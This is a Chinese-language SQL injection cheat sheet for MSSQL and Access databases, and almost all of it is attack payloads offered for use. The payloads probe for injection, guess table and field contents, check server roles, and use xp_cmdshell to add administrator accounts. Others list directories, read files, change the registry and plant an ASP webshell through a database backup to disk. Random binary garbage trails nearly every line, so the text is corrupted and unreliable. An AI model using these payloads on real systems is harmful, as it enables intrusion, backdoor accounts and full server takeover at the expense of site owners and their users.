1.判断是否有注入;and 1=1 ;and 1=2 ufw3�H9F(O
2.初步判断是否是mssql ;and user>0 Zk�=*7�?!!
dn��� Zz�A
3.注入参数是字符'and [查询条件] and ''=' /�2;d�H]o0
p^�1z�IC>F
4.搜索时没过滤参数的'and [查询条件] and '%25'=' g@~!�kh,TH
]�*N�:;J��
5.判断数据库系统 OXHvT/L`��
C��$<"w,
;and (select count(*) from sysobjects)>0 mssql VEj$^bpp5s
S�]&8S��t�
;and (select count(*) from msysobjects)>0 access #bT8�QbJ(�
-AjH�}A[!
�oW�1"%i�%
O' +"d�%2'
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �Q�2/Mn�M�
L[?�nST18%
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Kt
W�6AZ�J
{p�`mfEE�(
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 q,B3ru.�?d
��e�74zR�6
9.(1)猜字段的ascii值(access) B�%t�IwUE2
Vb@��4(�Q�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 U4>O�\�sU
�F�R:d�^mL
(2)猜字段的ascii值(mssql) �7}�b�e�>(
UJz#QkAio�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 .'|mY$�U~]
:{LAVMG�&^
10.测试权限结构(mssql) 'LVn^TB_f&
\�dRzS�@l�
QyPg
|#T2>
�X8/Tl�\c
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ]�3*P:$Rq�
h�a*�X6R��
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 55.;+B5L�*
��} h�[>U�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- CI`N8�
f=v
d%0+i�/�p�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- <�i{K7}�':
''�IoC �j
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �g"wx�C@IR
&lAQ ���&�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- wGvh�B%�8K
L���Vn�Ht}
;and 1=(select IS_MEMBER('db_owner'));-- H@{Objh��1
4j>�fI)FUW
�#�(C/Cx54
;���U��Y�c
11.添加mssql和系统的帐户 `}� =yG_!A
X��C�DS�mZ
;exec master.dbo.sp_addlogin username;-- 9tn�;L"#&N
;exec master.dbo.sp_password null,username,password;-- #G_��F�`�&
S�w)i��1S9
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- F|9+ +)���
Bv���$UFTz
;exec master.dbo.xp_cmdshell 'net user username password ;7Y�[c}V1^
) Qq'W�p3i
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �T�y�F{tuF
�2�i�\Q�@h
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 17}�$=#SX�
V/PAi�.GZ
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ���=�SAV|
dp�wD8Q<
U
!@G�)$�g=<
}j4�6L�1�T
12.(1)遍历目录 8pX�KO"u],
*8�b�K')W
;create table dirs(paths varchar(100), id int) �mEFw|�M�{
�Y�d:Q`#7A
;insert dirs exec master.dbo.xp_dirtree 'c:\' f1mHN7hx�W
!VwmPAMr#v
;and (select top 1 paths from dirs)>0 hSB?@I4s<\
$P��x�b�1E
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) d?A}��qA[(
-v+&pG?�m
�+2RNZEc�
fW�?�s�YC'
(2)遍历目录 � �~,"�N[Q
j!\dn!Xw�t
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ?}}qu'N:�N
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 $&h�N*7�Ts
p3c"ZP�O~z
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 %r�%So_^��
Qzqc� �.T�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ��a+`D'�?z
� PWH�^=K�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 =E(�#�YC�x
j�k*tL8?i
lCJ6�U�r�;
zI^]esX!2_
13.mssql中的存储过程 kA4@`�Y�Cl
,�2L$�G�&?
xp_regenumvalues 注册表根键, 子键 X32�C�}4-B
+r�]�zs�^'
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 {tw�+#}T a
�\'S�s�n(s
xp_regread 根键,子键,键值名 @PI%FV z~p
�� fR�B5U'
;exec xp_regread +m)�q%�I�>
&]F3�#�^!^
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 j�V���O{$j
dRW$T5dac�
xp_regwrite 根键,子键, 值名, 值类型, 值 nv0#~UgE#a
ve Tx, \6@
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 !R�'g�59g
UMU2^$\iS
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ����+b�A%�
��J0Z7���l
xp_regdeletevalue 根键,子键,值名 6cz/n8M�g
_c`K�+o�"3
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 <YB9Ac~}z�
�u�o2'"@[e
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ! ��zL�1;d
�aS84n.?vq
���Io ��n~
NBYH;h �P�
14.mssql的backup创建webshell X(�@uw�X$m
-MBV�$�:_R
use model 4��;�<ut$G
Dnw|�%6�Y�
create table cmd(str image); �Fh8lmOL;?
��8R/dA<Ww
insert into cmd(str) values (''); �3�BG>�Y(v
�;=�4Xz\�2
backup database model to disk='c:\l.asp'; �*�b�d[S0l
�$,�3J7�l3
= &t�m��P�
-C-yQ.>\T#
15.mssql内置函数 jQS 6�J+F]
M f~��}/h�
;and (select @@version)>0 获得Windows的版本号 �7f3��O���
6gH{�R$7L=
;and user_name()='dbo' 判断当前系统的连接用户是不是sa cl@�g�����
^v&D;<&R�
;and (select user_name())>0 爆当前系统的连接用户 �,��h���o3
q{0�R�=jb
;and (select db_name())>0 得到当前连接的数据库 �:|��+Qe e
oD9�^��ID+
[��sF(#Y:I
'Gl&P�a1g?
16.简洁的webshell e�J0�?=u!x
3djC;*,�9,
use model ?� *>]")[>
l12�{fp��m
create table cmd(str image); z^<L(/rg9"
�Fv�74bC�%
insert into cmd(str) values (''); :�,B7-k�Bw
q�IIJ4��n�
backup database model to disk='g:\wwwtest\l.asp';
